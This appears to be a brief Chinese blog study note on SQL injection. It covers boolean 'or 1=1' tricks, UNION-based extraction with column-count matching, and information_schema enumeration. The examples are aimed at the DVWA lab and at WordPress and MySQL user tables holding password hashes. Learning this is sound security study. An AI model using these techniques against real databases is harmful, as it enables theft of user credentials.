SQL
1. bool查询 or 1=1 只能查到这张表的记录
2.union查询 可以查到其他表的数据()
mysql> select user,password,host from mysql.user union select user_login,user_pass,3 from wordpress.wp_users;
a.得知道前面查的表的字段数,前后的字段数目得一样,可以用union select 1,2,3; 试出来
b.得知道后面的表的字段的名称 和前面的表个数一样 可以用数字凑够个数
select * from dvwa.users where 1=2 union select user_login,user_pass1,1,2,3,4 from wordpress.wp_users; 不想显示前面的表的数据,可以where 1=2
information_schema库(两个表TABLES和columns)
查库名
mysql> select DISTINCT TABLE_SCHEMA from information_schema.TABLES; //等价于show databases
查表名
mysql> select TABLE_NAME from INFORMATION_SCHEMA.tables where TABLE_SCHEMA='dvwa'; //等价于show tables
查字段名
mysql> select column_name from INFORMATION_SCHEMA.columns where table_schema='dvwa' and table_name='users';
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· 震惊!C++程序真的从main开始吗?99%的程序员都答错了
· 单元测试从入门到精通
· 【硬核科普】Trae如何「偷看」你的代码?零基础破解AI编程运行原理
· 上周热点回顾(3.3-3.9)
· winform 绘制太阳,地球,月球 运作规律